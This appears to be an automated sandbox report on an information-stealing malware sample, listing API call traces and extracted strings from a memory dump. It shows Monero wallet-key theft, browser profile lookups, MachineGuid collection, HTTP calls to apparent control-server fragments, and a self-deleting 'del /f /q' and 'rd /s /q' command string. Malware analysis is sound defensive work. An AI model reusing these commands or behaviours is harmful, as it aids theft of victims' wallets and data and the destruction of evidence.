                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00937C26
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0092618E
                                                                                                                                                                                                                • Part of subcall function 00925F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 009261D2
                                                                                                                                                                                                                • Part of subcall function 00925F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926200
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0093871B), ref: 0093728C
                                                                                                                                                                                                                • Part of subcall function 00932554: __EH_prolog3_catch_GS.LIBCMT ref: 0093255E
                                                                                                                                                                                                                • Part of subcall function 00932554: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00937FBD,.exe,00956CD4,00956CD0,00956CCC,00956CC8,00956CC4,00956CC0,00956CBC,00956CB8,00956CB4,00956CB0,00956CAC), ref: 0093257D
                                                                                                                                                                                                                • Part of subcall function 00932554: Process32First.KERNEL32(00000000,00000128), ref: 0093258D
                                                                                                                                                                                                                • Part of subcall function 00932554: Process32Next.KERNEL32(00000000,00000128), ref: 0093259F
                                                                                                                                                                                                                • Part of subcall function 00932554: StrCmpCA.SHLWAPI(?), ref: 009325B1
                                                                                                                                                                                                                • Part of subcall function 00932554: CloseHandle.KERNEL32(00000000), ref: 009325C5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0093818C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                                                              • String ID: .exe$.exe$65158feadb3cebfa5c9a9e36f0d461fe$_DEBUG.zip$cowod.$hopto$http://$org
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0093362A
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,true), ref: 009336EC
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,?), ref: 009337AE
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 009337DF
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093381B
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 00933857
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 00933893
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 009338CF
                                                                                                                                                                                                              • lstrcpyA.KERNEL32(?,00000000), ref: 0093390B
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 009339CF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                              • String ID: false$true
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0092527E
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00925285
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 009252A7
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009252C1
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009252F1
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00925330
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00925360
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0092536B
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00925394
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 009253DA
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925439
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925445
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00925451
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                              • String ID: GET
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009212A7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009212B6
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA94), ref: 009212D0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA98), ref: 009212DE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AA9C), ref: 009212EC
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA0), ref: 009212FA
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA4), ref: 00921308
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAA8), ref: 00921316
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAAC), ref: 00921324
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB0), ref: 00921332
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB4), ref: 00921340
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAB8), ref: 0092134E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AABC), ref: 0092135C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAC0), ref: 0092136A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095AAC4), ref: 00921378
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00921385), ref: 00930C66
                                                                                                                                                                                                                • Part of subcall function 00930C5A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00921385), ref: 00930C6D
                                                                                                                                                                                                                • Part of subcall function 00930C5A: GetComputerNameA.KERNEL32(00000000,00921385), ref: 00930C81
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 009213E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0095670E,00000000,?,?), ref: 00931248
                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00931285
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009312B2
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 009312D1
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00931307
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093131C
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00956E94), ref: 009313B1
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0093141B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0093143B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00931447
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                              • API String ID: 2394436309-3278919252
                                                                                                                                                                                                              • Opcode ID: bc216a0eac781ebb57b6f909f3ee7c297d091efcfd2194a18ff171a5b33fe977
                                                                                                                                                                                                              • Instruction ID: 9fed885dcce80f9d2cfbde50d2d3408733891732fe757f5ed309ca5d83278d07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc216a0eac781ebb57b6f909f3ee7c297d091efcfd2194a18ff171a5b33fe977
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD61947590012C9BEB21DB55DD85EDAB7B8AF89704F1086E5A609A3122DF30AEC9CF50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938422
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938431
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 00938446
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 009385E2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009385F1
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00938603
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00938613
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • " & exit, xrefs: 00938515
                                                                                                                                                                                                              • " & exit, xrefs: 00938566
                                                                                                                                                                                                              • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 0093851C
                                                                                                                                                                                                              • " & rd /s /q "C:\ProgramData\, xrefs: 009384BF
                                                                                                                                                                                                              • /c timeout /t 10 & del /f /q ", xrefs: 00938471
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                              • API String ID: 2823247455-1079830800
                                                                                                                                                                                                              • Opcode ID: fbb4eeed19911ed317bc07b0ba9552348d4699fb321695817f5a55ce4696f61d
                                                                                                                                                                                                              • Instruction ID: 42fcea5671d1a60be76330016faa43babd551514b3a61b908c65c275d1e7c008
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbb4eeed19911ed317bc07b0ba9552348d4699fb321695817f5a55ce4696f61d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E5194B1D4022A9BCB65EF25DD82B9DB3BCAB84704F4101E5B708B7152DA70AF868F54
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 009309AA
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009309EA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00930A3F
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00930A46
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00930A7C
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00956E44), ref: 00930A8B
                                                                                                                                                                                                                • Part of subcall function 00931659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 00931659: _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                                • Part of subcall function 00931659: lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00930AA2
                                                                                                                                                                                                                • Part of subcall function 009323AA: malloc.MSVCRT ref: 009323AF
                                                                                                                                                                                                                • Part of subcall function 009323AA: strncpy.MSVCRT ref: 009323C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00930AC5
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                              • String ID: :\$C$QuBi
                                                                                                                                                                                                              • API String ID: 1856320939-239756005
                                                                                                                                                                                                              • Opcode ID: 3f6b6c22cc1d8df25e4763b0cd4d1a981bce3abf2bba2b49587379dff349fa5f
                                                                                                                                                                                                              • Instruction ID: 8d7d079364e12b4040955ef1f78893df4ea0d796e75de60b6a0021eb28258f10
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f6b6c22cc1d8df25e4763b0cd4d1a981bce3abf2bba2b49587379dff349fa5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B418E71904228ABDB259F749D86ADEBBBCEF4D304F0000E5F149E7121DA708F958FA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                                • Part of subcall function 00926963: StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                                • Part of subcall function 00926963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                                • Part of subcall function 00926963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 0093695C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00936967
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?), ref: 0093697C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0093698B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 009369A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                              • API String ID: 4174444224-1526165396
                                                                                                                                                                                                              • Opcode ID: 4e110a3d5f541031cb2104ce9b4abcbc240cf606774901430244805076458bc6
                                                                                                                                                                                                              • Instruction ID: efb806e2c086fd0d01aeff1e2e93041bc2b66beeba84abb9a37ce72de0c04c31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e110a3d5f541031cb2104ce9b4abcbc240cf606774901430244805076458bc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4821CD35900218BBCB21BF34EC4AAAE7FB8AF85700F508165FC15E3166DB35D9498F81
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EACE
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EB2B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0092EDF2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092EC08
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092ECB8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 0092ED15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                                                              • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                              • API String ID: 3722407311-2697854757
                                                                                                                                                                                                              • Opcode ID: 56037c33782ac8afae5367928c45fa46691f76c1f0ac435f6c57bc3b4f64bed9
                                                                                                                                                                                                              • Instruction ID: 5817e9f723a3ee4c6fb56395460e25c02a773e29ef81ad607018f54c18956d5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56037c33782ac8afae5367928c45fa46691f76c1f0ac435f6c57bc3b4f64bed9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BB15D36D00119ABCF20FFA9ED47B9DBBB5AFC4310F554110FD08B7255EA30AA598B92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00921ADC
                                                                                                                                                                                                                • Part of subcall function 00921A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00921A65
                                                                                                                                                                                                                • Part of subcall function 00921A51: HeapAlloc.KERNEL32(00000000), ref: 00921A6C
                                                                                                                                                                                                                • Part of subcall function 00921A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00921AE9), ref: 00921A89
                                                                                                                                                                                                                • Part of subcall function 00921A51: RegQueryValueExA.ADVAPI32(00921AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00921AA4
                                                                                                                                                                                                                • Part of subcall function 00921A51: RegCloseKey.ADVAPI32(00921AE9), ref: 00921AAD
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00921AF1
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00921AFE
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,.keys), ref: 00921B19
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00921C2A
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00921C9D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                              • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                              • API String ID: 615783205-3586502688
                                                                                                                                                                                                              • Opcode ID: 2740a499e781c5b7b9db8543e5aaf6d11f1f0d5eea9de710ae7387c045172f78
                                                                                                                                                                                                              • Instruction ID: c2c13337250dcd33beb4af4570119d899938aaf469669807b5971a52de08e4f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2740a499e781c5b7b9db8543e5aaf6d11f1f0d5eea9de710ae7387c045172f78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2951F575D9012E9BCB21FB64ED46BDD7778AF84304F4045A1B608B7156DA30AFCA8F84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0092FB27
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0092FB53
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092FB96
                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0092FCEC
                                                                                                                                                                                                                • Part of subcall function 0092F005: _memmove.LIBCMT ref: 0092F01F
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: OpenProcess_memmove_memset
                                                                                                                                                                                                              • String ID: N0ZWFt
                                                                                                                                                                                                              • API String ID: 2647191932-431618156
                                                                                                                                                                                                              • Opcode ID: 1ff14ee1cf7984e29dd92a803250f89792846464823fed51aeff464caa6009fb
                                                                                                                                                                                                              • Instruction ID: 3239f8c60839930779647e0c5111abf6a4db58d4b92683efb447e47c464ec7cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ff14ee1cf7984e29dd92a803250f89792846464823fed51aeff464caa6009fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F25180B1D0022C9BDB20AF64EC95BEDB7B9AB84304F4001F9A609A7156DA716E88CF55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009315DC
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 009315FB
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00931620
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?), ref: 0093162C
                                                                                                                                                                                                              • CharToOemA.USER32(?,?), ref: 00931640
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                              • API String ID: 2235053359-1211650757
                                                                                                                                                                                                              • Opcode ID: 2c9b78bad72d69a39dcd71c950180ced7f083d84b7b01c10769ae38e84856cb7
                                                                                                                                                                                                              • Instruction ID: 7b11a944ebd5b6cc8dc442d520aca71bcfab56d74fab43488de210e16c3c5a55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c9b78bad72d69a39dcd71c950180ced7f083d84b7b01c10769ae38e84856cb7
